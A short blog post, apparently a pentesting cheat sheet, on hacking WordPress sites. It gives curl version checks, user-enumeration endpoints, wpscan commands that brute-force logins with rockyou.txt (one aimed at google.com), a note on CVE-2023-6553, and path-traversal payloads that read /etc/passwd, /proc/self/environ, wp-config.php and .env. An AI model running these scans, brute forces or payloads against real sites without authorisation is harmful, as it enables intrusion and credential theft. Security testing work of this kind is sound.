Post

Wordpress Hacking Stuff

Posted Updated
Preview Image
By
2 min read
Wordpress Hacking Stuff

WordPress sites are frequently hacked due to automated attacks targeting common vulnerabilities, primarily exploiting outdated plugins, themes, or weak user credentials. Hackers use tools to scan for known flaws across millions of sites, often focusing on unpatched plugins and themes, which are the leading cause of compromises. A single vulnerable plugin can allow attackers to gain full control, install malware, or redirect traffic.

Key Attack Methods

  • Versions Detection:
  • CVE Exploitation:
  • Common Creds and Weak Creds:
  • Plugin and Theme Vulnerabilities:
  • Brute Force & Dictionary Attacks:
  • Session Hijacking:
  • Phishing:
  • Exploiting Core Vulnerabilities:
  • Malware Distribution via Blockchain:

Manually Hacking

Version

1
2
3
4
5
6

# Manually check source code
Press ----> Ctrl + f (Search wordpress)

# Curl
curl -s http://example.com/ | grep 'WordPress'     # http
curl -s https://example.com/ | grep 'WordPress'    # https

Username

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

# Sitemap
      /wp-sitemap-users-1.xml
      /sitemap.xml
      /author-sitemap.xml

# Authors Brute force
      /author/username/.

# oembed api
      /?rest_route=/oembed/1.0/embed&url=

# wp-json
      /wp-json/wp/v2/users
      /wp-json/wp/v2/users/ grep -i 'name'

# login page Error Messages
      Validate the list of users, have there account exists or not !

Updating in a mean while…

Automation Hacking

Version

1

wpscan --url http://example.com   --api-token YOUR_API_TOKEN

Username

1

wpscan --url http://target.com --enumerate u   --api-token YOUR_API_TOKEN

Login Page Username and Password Brute force

1
2
3
4
5

# Enumerate users and Brute passwords
wpscan --url https://google.com/ -e u -P /usr/share/wordlists/rockyou.txt

# Specific user Password Brute force
wpscan --url https://google.com -U admin -P /usr/share/wordlists/rockyou.txt --threads 10

⚡Overall Power

1
2
3
4
5
6
7
8
9
10

wpscan --url https://example.com/ -e ap,vt,vp,tt,cb,dbe,u,m --api-token <token>  --format json --output scan.json

ap ---> All plugins
vp ---> Vulnerable plugins
vt ---> Vulnerable themes
tt ---> Timthumbs
cb ---> Config backups
dbe --> Database exports
u  ---> User IDs
m  ---> Media IDs

Updating in a mean while…

CVE Exploitation

CVE-2023-6553

This cve shows the Remote Code Execution vulnerbility in Backup Migration wordpress Plugin Version=1.3.7 via the /includes/backup-heart.php file. You can Download the backup via /wp-content/uploads/* directory.

Nuclei Template Detection Nuclei Resource link

image

lfi

local file Inclusion

1
2
3
4
5
6

/wordpress/images../etc/passwd
/wordpress/images../etc/nginx/sites-available/default
/wordpress/images../proc/self/cmdline
/wordpress/images../proc/self/environ
/wordpress/images../wp-config.php
/wordpress/images../.env
Web Exploitation
wordpress-hacking wordpress
This post is licensed under CC BY 4.0 by the author.